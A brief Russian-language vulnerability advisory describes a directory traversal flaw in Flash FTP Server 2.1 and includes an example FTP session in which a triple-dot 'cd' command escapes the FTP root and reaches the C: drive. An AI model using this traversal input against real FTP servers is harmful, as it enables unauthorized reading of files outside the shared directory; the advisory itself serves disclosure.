Программа: Flash FTP Server 2.1 

Уязвимость в Flash FTP Server позволяет удаленному пользователю просматривать файлы на целевой системе расположенные вне FTp root каталога. 

Пример: 

ftp> cd …
—> CWD …
250 CWD command successful. «C:/inetpub/ftproot/…/» is current directory.
ftp> cd /
—> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
—> XPWD
257 «/C:/» is current directory.

Оставить мнение